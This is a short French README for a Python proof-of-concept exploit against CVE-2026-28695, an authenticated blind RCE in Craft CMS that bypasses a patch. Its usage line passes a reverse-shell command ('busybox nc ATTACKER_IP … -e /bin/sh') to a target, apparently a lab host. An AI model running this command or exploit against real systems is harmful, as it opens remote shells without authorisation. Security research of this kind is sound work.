
PoC d'exploitation en Python pour CVE-2026-28695, une RCE aveugle authentifiée dans Craft CMS qui contourne le correctif create() de BaseObject et lance un reverse shell.
Exécution de code à distance aveugle et authentifiée dans Craft CMS. Contourne la restriction create() - BaseObject ajoutée dans le correctif CVE-2026-28695 (commit e31e508).
python3 exp.py -t http://target.htb -u user -p 'password' -c 'busybox nc ATTACKER_IP ATTACKER_PORT -e /bin/sh'
Ce script est destiné à des fins éducatives uniquement. L'auteur n'est pas responsable de toute mauvaise utilisation ou de tout dommage causé par cet exploit. Assurez-vous toujours d'avoir l'autorisation avant de tester ou d'exploiter des vulnérabilités !